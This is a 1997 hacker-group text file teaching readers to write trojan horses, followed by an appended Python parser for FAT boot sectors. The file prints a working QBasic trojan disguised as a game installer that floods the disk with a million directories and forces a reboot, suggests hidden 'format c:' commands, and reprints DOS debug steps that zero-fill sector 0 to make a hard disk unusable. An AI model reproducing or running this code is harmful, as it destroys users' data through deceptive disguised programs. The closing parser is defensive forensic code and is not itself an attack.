*************************************
*       PISS PHILEZ NUMBER 4        *
*                                   *
*      Easy Quick Virus Writing     *
*                                   *
*         by Defenestrator          *
*************************************

WARNING: This file is for information only. If you use it in any harmful manner then me, my friends, PISS, and anyone I know cannot be held responsible.

OVERVIEW
--------

Today, viruses seem to be portrayed as anything which harms computers. There are many types of files like this, like trojan horses, logic bombs, real viruses, worms, etc. But all these dumbass people think all of these are viruses. If you do, you're a fuckin idiot and should read more. If you know these then skip this section.

Trojan Horse- a file hidden inside another seemingly okay file which does stuff the masking program doesn't do. The name is derived from Greek mythology, when during the Iliad the Trojans gave their enemies a big damn horse as a gift, but armies were hidden inside. Just a little insight for ya.

Logic Bombs- a program which has a certain condition which must be met before the program starts- like the Michelangelo virus of a few years back. It would only start on March 6, Michelangelo's birthday, and would wipe the hard drive. However, smart people figured just set the date wrong and skip the 6th.

Viruses- a program which reproduces itself onto several machines, attaching on to files to procreate.

Worms- a program which spreads from machine to machine using one machine as a host (not used a lot)

EASY WRITING
------------

To truly write a simple trojan horse, use the simplest programming language. I either use batch programming or QBasic. I also know someone who does cool stuff in DOS Debug. All are absurdly easy to write and evade the scanners with.

BATCH PROGRAMMING
-----------------

Batch programming, for those of you who are newbies or just stupid, is taking MS-DOS batch commands and sticking them in a file which can be run on its own. If you don't know MS-DOS commands, I'm NOT GONNA TEACH YOU CUZ YOU'RE STUPID!
I use Linux and Win95 but still know all the DOS commands. Just remember, before anything you write, put [@echo off] so that the person getting this doesn't know what's going on.

QBASIC stuff
------------

QBasic is a REAL simple programming language, so if you want to learn to program this is always a starting place. I learned how to use the old BASIC in like 3rd grade, which was like 10 years ago. Most of the commands are still almost the same. And best of all, this program is either free or comes with your computer (on Win95 you gotta go get it). But it's not like I paid for any other program lately either, so to me everything's free!

How can we use this to do cool things? Like this: This is an example of a trojan horse I wrote which poses as an install program for a game. The "game" is made more realistic by zipping it and adding bogus *.dat files which make it look like it's actually a real program. Here goes:

REM bitch by Defenestrator
COLOR 14, 0
PRINT "Are you in DOS?"
INPUT x$
IF x$ = "yes" THEN GOTO 1 ELSE GOTO 2
1 PRINT "Installing datafiles..please wait..."
PRINT "This may take up to 20 minutes.."
SHELL "cd\"
FOR a = 1 TO 1000000
a$ = STR$(a)
c$ = "md" + a$ + ".hee"
SHELL c$
NEXT a
CLS
PRINT "P.I.S.S. 1.0 is now installed on your system"
PRINT "Have a shitty day!"
PRINT "Press Enter to reboot your system!"
OUT &H64, &HFE
END
2 PRINT "Go to DOS before running P.I.S.S. 1.0"
END

Let's take this SIMPLE program apart. This simple trojan horse poses as an installer, but instead makes 1 million directories from the c:\ drive which cannot be deleted without being a real pain in the ass with Norton Commander, or just reformatting the hard drive. The SHELL "" runs a DOS command without showing it, which is good if you want to be real easy and do SHELL "format c:\". It's also a good idea to get a compiler for QBasic because the code can be read by any text file viewer, which is the only major drawback of QBasic. That and it can't draw worth shit.
So if you want to learn more QBasic, e-mail me, look in the help files, or keyword search on altavista.

DOS DEBUG
---------

I don't know a lot of debug, so I'm gonna reprint an article in a mail list I subscribe to. This article is courtesy of w0rmh0le.

Disclaimer: I am not responsible for any damage following the guidelines of this text may incur on your system. These commands can be dangerous if used incorrectly. I am not responsible for any damage of your life, liberty, and all that good stuff, blah, blah as a result of the misuse of any materials herein. Proceed with extreme caution. Have a nice day.

Dos Debug which is distributed with every version of Windows 95 has some interesting commands which I think many people have overlooked. In this post I will show you some very powerful things you can do with this tiny, harmless little program....

Please note that commands are not case sensitive and I have used capitals in most cases for clarification.

To start debug, go get the dos command prompt (whichever way you prefer). You should get a hyphen "-" prompt. You can type "?" followed by return at this time to get a list of all (documented) commands. All commands are followed by returns btw. Anyway, the commands we are interested in are L (load), W (write), and F (fill). I'll explain load first.

NOTE: All values must be in hexadecimal. It sounds confusing at first, but it's really not once you know what you are doing.

To use load, one usually does something like this:

-N foo.com
-L 100

This tells the computer the name of the program you are working on, and where to load it into memory. However, we are going to use a more arcane method, which is called the absolute read. (voice echoes) An absolute read simply allows you to read byte space straight off of any disk on your computer. You do this by first typing "L" at the hyphen, followed by the address in memory you want it loaded into, followed by a number specifying the drive number (0 = A:, 1 = B:, 2 = C:, etc.) followed by the sector address to begin reading at followed by the amount of bytes to read. Easy, no? Hehe.

Ex. L 0 0 0 25

This loads 25h bytes from the first sector of the floppy disk in A: into memory starting at offset 0h in the current segment. Note that a max of 80h bytes can be read at one time.

The write command is almost exactly the same as the read command, so it doesn't require much explanation now except that it does the opposite of the load command.

Ex. W 0 0 0 25

This writes 25h bytes to A: from 0h in memory to the first sector of the disk.

To use fill, type "F" followed by the memory address you want to start filling at, followed by an "L", followed by how many bytes to fill and finally the byte you want to fill with. The "L" does not mean load, but rather length.

Ex. F 100 L 25 FF

This would fill 25h bytes starting at 100h in memory with the byte value FF which, by the way, is basically meaningless.

Now for the fun part. If you understand all of the above, either you are very persistent, or you know something of how disks really work. Bringing it all together is the key here. I will first show you an attack which can take less than a minute to do. My comments are followed by the semicolons.

C:\>debug
-F 0 L 80 00    ;fill an area of memory with 00h null bytes.
-W 0 2 0 80     ;write to the drive.
-Q              ;quit

This attack has just rendered the hard disk unusable in less than a minute's time. I recommend IF YOU KNOW WHAT YOU ARE DOING to try this out on a floppy disk. It will be rendered unusable. The commands follow:

C:\>debug
-F 0 L 80 00
-W 0 0 0 80     ;take note of the second zero PLEASE.
-Q

Ok, I'm done with the malicious stuff, onto some fun. I have found out that volume labels in dos start at the 27th byte of any hard or floppy disk. Check this out:

-L 0 0 0 80         ;change the second zero to whatever if you want.
-E 27 xx xx xx xx   ;where the xx's are the new label in bytes. You have to insert your label backwards in pairs of two.
-W 0 0 0 80         ;write to floppy.
-Q                  ;quit

The "E" command enters our bytes into memory.

Phun ex.

-L 0 0 0 80
-E 27 66 06 00 00   ;Figure this one out on your own...
-W 0 0 0 80
-Q

There are numerous other things you can play with too, so get some debug docs, or e-mail me for one I found. Have phun!

<-----a production of----->
\/\/0rmH0Le
w0rmh0le@hotmail.com
"Internet security is an oxymoron"

----------------------------------------------------------------------

PISS - People into Serious Shit

Founderz - Defenestrator, PhrostByte
Memberz - Author Parselon Wu Forever kQs CGibbons Extinction Faekon/Homarid Grench Greenseed Tim 121 Rhodekyll
Contributors- Sameer Ketkar

Want more stuff? Go to http://www.angelfire.com/sc/PISS/philez.html
The site will change as soon as I get money for one..
E-mail the group at davematthews@rocketmail.com

©1997 PISS Publications
This file may be posted freely as long as this notice stays on the file. All rights reserved.
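An added, defender-side example that is not part of the original philez or of w0rmh0le's post: a Python parser for the sector that the debug L/W examples above read and write, sector 0 of a FAT floppy or partition. It decodes the identifying fields of the FAT boot sector and BIOS Parameter Block and lists integrity problems, which is how a forensic or recovery tool tells an intact sector 0 from one that has been zero-filled the way the F/W sequence above does. Offsets follow the FAT boot-sector layout rather than the post's description: the four little-endian bytes at 27h are the volume serial number (so "66 06 00 00" decodes to serial 0000-0666), and the eleven-byte volume label proper sits at 2Bh. The sample sector is constructed in code, not read from a disk; nothing here touches a real drive.

```python
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = 0xAA55  # the bytes 55 AA at offset 1FEh, read little-endian


def build_sample_floppy(serial=0x12345678, label="NO NAME"):
    """Construct a plausible FAT12 boot sector for a 1.44 MB floppy.

    Synthetic test data, not a dump of a real disk.  Field order and
    offsets are those of the FAT boot sector / BIOS Parameter Block (BPB).
    """
    sec = bytearray(SECTOR_SIZE)
    sec[0:3] = b"\xEB\x3C\x90"        # short jump over the BPB, as real boot code has
    sec[3:11] = b"MSWIN4.1"           # OEM name (8 bytes)
    # 0Bh..23h: bytes/sector, sectors/cluster, reserved sectors, FAT count,
    # root entries, total sectors (16-bit), media descriptor, sectors/FAT,
    # sectors/track, heads, hidden sectors, total sectors (32-bit)
    struct.pack_into("<HBHBHHBHHHII", sec, 0x0B,
                     512, 1, 1, 2, 224, 2880, 0xF0, 9, 18, 2, 0, 0)
    # 24h..2Ah: drive number, reserved byte, extended boot signature 29h,
    # then the 4-byte little-endian volume serial number at 27h
    struct.pack_into("<BBBI", sec, 0x24, 0, 0, 0x29, serial)
    sec[0x2B:0x36] = label.encode("ascii").ljust(11)[:11]   # 11-byte volume label
    sec[0x36:0x3E] = b"FAT12   "                            # file system type string
    struct.pack_into("<H", sec, 0x1FE, BOOT_SIGNATURE)
    return bytes(sec)


def parse_boot_sector(sector):
    """Decode the identifying BPB fields and list integrity problems.

    Returns a dict; "ok" is True only when no problem was found.  An
    all-zero sector, like one produced by filling memory with 00h and
    writing it over sector 0, fails several of these checks at once.
    """
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    problems = []
    if sector[0] not in (0xEB, 0xE9):
        problems.append("no x86 jump at offset 0 (boot code missing or overwritten)")
    (bytes_per_sector, sectors_per_cluster, reserved, num_fats, root_entries,
     total_sectors, media, sectors_per_fat) = struct.unpack_from("<HBHBHHBH", sector, 0x0B)
    if bytes_per_sector not in (512, 1024, 2048, 4096):
        problems.append("bytes per sector %d is not a valid FAT value" % bytes_per_sector)
    if sectors_per_cluster == 0 or sectors_per_cluster & (sectors_per_cluster - 1):
        problems.append("sectors per cluster must be a non-zero power of two")
    if reserved == 0:
        problems.append("reserved sector count is 0 (the boot sector itself must be reserved)")
    if num_fats == 0:
        problems.append("FAT count is 0")
    if media < 0xF0:
        problems.append("media descriptor %#x is not in F0h..FFh" % media)
    serial = struct.unpack_from("<I", sector, 0x27)[0]
    label = sector[0x2B:0x36].decode("ascii", "replace").rstrip(" \x00")
    fstype = sector[0x36:0x3E].decode("ascii", "replace").rstrip(" \x00")
    if struct.unpack_from("<H", sector, 0x1FE)[0] != BOOT_SIGNATURE:
        problems.append("boot signature 55 AA missing at offset 1FEh")
    return {
        "ok": not problems,
        "problems": problems,
        "oem_name": sector[3:11].decode("ascii", "replace").rstrip(),
        "volume_serial": serial,
        "serial_string": "%04X-%04X" % (serial >> 16, serial & 0xFFFF),
        "volume_label": label,
        "fs_type": fstype,
        "total_sectors": total_sectors,
    }


if __name__ == "__main__":
    good = build_sample_floppy(serial=0x00000666, label="PISS4")
    print(parse_boot_sector(good))
    print(parse_boot_sector(bytes(SECTOR_SIZE)))   # the zero-filled case
```

The same checks apply to a sector read from a disk image (open the image, read 512 bytes at offset 0 or at the partition start, and pass them in); keeping a known-good copy of sector 0 and comparing the decoded fields against it is the usual way to spot an overwritten boot sector before attempting recovery.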